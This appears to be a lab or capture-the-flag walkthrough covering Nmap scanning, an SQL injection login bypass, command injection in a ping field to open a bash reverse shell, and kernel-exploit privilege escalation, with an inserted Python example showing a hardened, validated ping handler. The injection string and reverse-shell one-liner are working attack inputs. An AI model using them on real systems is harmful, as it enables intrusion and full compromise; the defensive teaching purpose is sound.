We start by scanning the host with Nmap:
Scan the host with nmap -A -T4 -p- <ip> -vv

Visiting the page on port 80 shows that it requires an admin login and password …
From the nmap scan we can see a MySQL database.
Using a SQL injection string (admin' or '1'='1'#) in the username field got us through.


In the ping part we can insert bash -i >& /dev/tcp/<192.168.1.9>/<4444> 0>&1 to get a bash shell on the server.
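Why the ping field accepts that input, and how a handler should treat it, as an added example that is not part of the original walkthrough. It assumes the form value is concatenated into a shell command (the page does not show the handler); all function names are hypothetical.

```python
import ipaddress
import subprocess


def vulnerable_command(target):
    # Assumed shape of the flawed handler: the form value is appended to a
    # string that is later handed to a shell, so the shell interprets
    # everything the user typed, redirections included.
    return "ping -c 3 " + target


def parse_target(value):
    """Return a canonical IP address string or raise ValueError."""
    # ip_address() rejects spaces, shell metacharacters, option-like
    # values starting with '-', and anything that is not a bare address.
    addr = ipaddress.ip_address(value)
    if getattr(addr, "scope_id", None):
        # IPv6 zone IDs ("fe80::1%eth0") carry free-form text after '%'.
        raise ValueError("scoped IPv6 addresses are not accepted")
    return str(addr)


def ping_argv(value):
    # Hardened form: validated address, fixed argument list, no shell.
    return ["ping", "-c", "3", parse_target(value)]


def run_ping(value):
    try:
        argv = ping_argv(value)
    except ValueError:
        return "invalid address"
    try:
        done = subprocess.run(argv, capture_output=True, text=True,
                              timeout=15, check=False)
    except (OSError, subprocess.TimeoutExpired):
        return "ping failed"
    return done.stdout


if __name__ == "__main__":
    # Constructed inputs; the second is the string quoted in the walkthrough.
    samples = ["192.168.1.9",
               "bash -i >& /dev/tcp/<192.168.1.9>/<4444> 0>&1",
               "192.168.1.9 extra", "fe80::1%eth0"]
    for s in samples:
        try:
            print("accepted:", ping_argv(s))
        except ValueError as exc:
            print("rejected:", repr(s), "-", exc)
```

With the hardened form the walkthrough's input never reaches a shell: it fails address validation, and even a value that passed would be a single argv element to ping.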

Straight to privilege escalation: run the command cat /etc/*-release

As we can see here, the output shows the version, which we can use to search for an exploit on Google or just by using Searchsploit.

I downloaded the exploit to my drive, then started a SimpleHTTPServer to upload the exploit to the host.

cd to the tmp folder and run a wget command to download the patch file

Compile the file and run it … check for root
